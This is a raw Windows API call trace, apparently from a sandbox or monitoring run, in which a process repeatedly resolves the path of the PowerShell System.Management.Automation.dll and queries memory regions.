	[0161.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.845] GetLastError () returned 0x0
	[0161.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.845] GetLastError () returned 0x0
	[0161.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.845] GetLastError () returned 0x0
	[0161.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.845] GetLastError () returned 0x0
	[0161.845] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xeda6c304, Data2=0xbdfe, Data3=0x4001, Data4=([0]=0x9c, [1]=0xce, [2]=0xee, [3]=0x11, [4]=0x2f, [5]=0x73, [6]=0x51, [7]=0xf9))) returned 0x0
	[0161.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.846] GetLastError () returned 0x0
	[0161.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.846] GetLastError () returned 0x0
	[0161.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.846] GetLastError () returned 0x0
	[0161.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.846] GetLastError () returned 0x0
	[0161.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.846] GetLastError () returned 0x0
	[0161.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.846] GetLastError () returned 0x0
	[0161.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.846] GetLastError () returned 0x0
	[0161.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.847] GetLastError () returned 0x0
	[0161.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.847] GetLastError () returned 0x0
	[0161.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.847] GetLastError () returned 0x0
	[0161.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.847] GetLastError () returned 0x0
	[0161.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.847] GetLastError () returned 0x0
	[0161.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.847] GetLastError () returned 0x0
	[0161.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.847] GetLastError () returned 0x0
	[0161.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.847] GetLastError () returned 0x0
	[0161.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.848] GetLastError () returned 0x0
	[0161.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.848] GetLastError () returned 0x0
	[0161.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.848] GetLastError () returned 0x0
	[0161.848] VirtualQuery (in: lpAddress=0x14cbf4, lpBuffer=0x14dbf4, dwLength=0x1c | out: lpBuffer=0x14dbf4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.849] GetLastError () returned 0x0
	[0161.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.849] GetLastError () returned 0x0
	[0161.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.849] GetLastError () returned 0x0
	[0161.849] VirtualQuery (in: lpAddress=0x14cbf4, lpBuffer=0x14dbf4, dwLength=0x1c | out: lpBuffer=0x14dbf4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.849] VirtualQuery (in: lpAddress=0x14cc30, lpBuffer=0x14dc30, dwLength=0x1c | out: lpBuffer=0x14dc30*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.850] GetLastError () returned 0x0
	[0161.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.850] GetLastError () returned 0x0
	[0161.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.850] GetLastError () returned 0x0
	[0161.850] VirtualQuery (in: lpAddress=0x14cbf4, lpBuffer=0x14dbf4, dwLength=0x1c | out: lpBuffer=0x14dbf4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.851] VirtualQuery (in: lpAddress=0x14cc30, lpBuffer=0x14dc30, dwLength=0x1c | out: lpBuffer=0x14dc30*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.851] GetLastError () returned 0x0
	[0161.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.852] GetLastError () returned 0x0
	[0161.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.852] GetLastError () returned 0x0
	[0161.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.852] GetLastError () returned 0x0
	[0161.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.852] GetLastError () returned 0x0
	[0161.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.852] GetLastError () returned 0x0
	[0161.852] VirtualQuery (in: lpAddress=0x14cbf4, lpBuffer=0x14dbf4, dwLength=0x1c | out: lpBuffer=0x14dbf4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.853] VirtualQuery (in: lpAddress=0x14cc30, lpBuffer=0x14dc30, dwLength=0x1c | out: lpBuffer=0x14dc30*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.853] GetLastError () returned 0x0
	[0161.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.853] GetLastError () returned 0x0
	[0161.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.853] GetLastError () returned 0x0
	[0161.853] VirtualQuery (in: lpAddress=0x14cbf4, lpBuffer=0x14dbf4, dwLength=0x1c | out: lpBuffer=0x14dbf4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.853] VirtualQuery (in: lpAddress=0x14cc30, lpBuffer=0x14dc30, dwLength=0x1c | out: lpBuffer=0x14dc30*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.854] GetLastError () returned 0x0
	[0161.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.854] GetLastError () returned 0x0
	[0161.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.854] GetLastError () returned 0x0
	[0161.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.854] GetLastError () returned 0x0
	[0161.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.854] GetLastError () returned 0x0
	[0161.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.854] GetLastError () returned 0x0
	[0161.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.855] GetLastError () returned 0x0
	[0161.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.855] GetLastError () returned 0x0
	[0161.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.855] GetLastError () returned 0x0
	[0161.855] VirtualQuery (in: lpAddress=0x14cbf4, lpBuffer=0x14dbf4, dwLength=0x1c | out: lpBuffer=0x14dbf4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.856] VirtualQuery (in: lpAddress=0x14cc30, lpBuffer=0x14dc30, dwLength=0x1c | out: lpBuffer=0x14dc30*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.856] GetLastError () returned 0x0
	[0161.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.856] GetLastError () returned 0x0
	[0161.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.856] GetLastError () returned 0x0
	[0161.856] VirtualQuery (in: lpAddress=0x14cbf4, lpBuffer=0x14dbf4, dwLength=0x1c | out: lpBuffer=0x14dbf4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.856] VirtualQuery (in: lpAddress=0x14cc30, lpBuffer=0x14dc30, dwLength=0x1c | out: lpBuffer=0x14dc30*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.857] GetLastError () returned 0x0
	[0161.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.857] GetLastError () returned 0x0
	[0161.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.857] GetLastError () returned 0x0
	[0161.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.857] GetLastError () returned 0x0
